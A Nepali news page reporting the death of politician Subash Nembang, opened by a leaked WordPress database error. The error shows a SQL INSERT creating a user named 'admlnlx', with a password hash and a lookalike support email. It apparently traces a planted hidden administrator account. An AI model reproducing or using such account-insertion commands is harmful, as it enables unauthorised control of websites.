WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7H6D1KH8QN2Ei8SYwRUCvGhPVXYHh/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-10 14:58:09', '', 'admlnlx', 'admlnlx')
काठमाडौं । नेकपा एमाले उपाध्यक्ष तथ संविधानसभा अध्यक्ष सुवास नेम्वाङको निधन भएको छ ।
प्रतिनिधि सभा सदस्य समेत रहेका नेम्वाङको मंगलबार राति १ बजे हृदयघातबाट निधन भएको हो ।
बालुवाटर आफ्नै निवासमा हृदयघात भएपछि महाराजगन्जस्थित टिचिङ अस्पताल लगिएको थियो । नेम्बाङले २०५६ साल पछिका सबै चुनाब इलाम २ बाट जित्दै आएका थिए । उनी २०६४ देखि संविधान जारी हुँदा संविधान सभाका अध्यक्ष थिए ।